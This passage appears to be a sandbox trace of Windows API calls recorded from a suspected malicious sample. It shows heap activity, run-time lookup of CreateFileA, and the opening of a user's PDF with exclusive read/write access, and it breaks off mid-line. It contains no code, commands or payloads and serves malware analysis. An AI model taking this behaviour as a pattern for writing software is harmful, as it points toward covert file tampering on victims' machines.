[0035.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.358] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.358] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.358] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.358] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.358] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0035.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.361] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.363] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cef8 [0035.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cef8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.364] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cef8 [0035.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cef8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.364] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0035.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", cchWideChar=84, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 84 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x54) returned 0x794b90 [0035.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", cchWideChar=84, lpMultiByteStr=0x794b90, cbMultiByte=84, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", lpUsedDefaultChar=0x0) returned 84 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.365] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\p_vq.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, 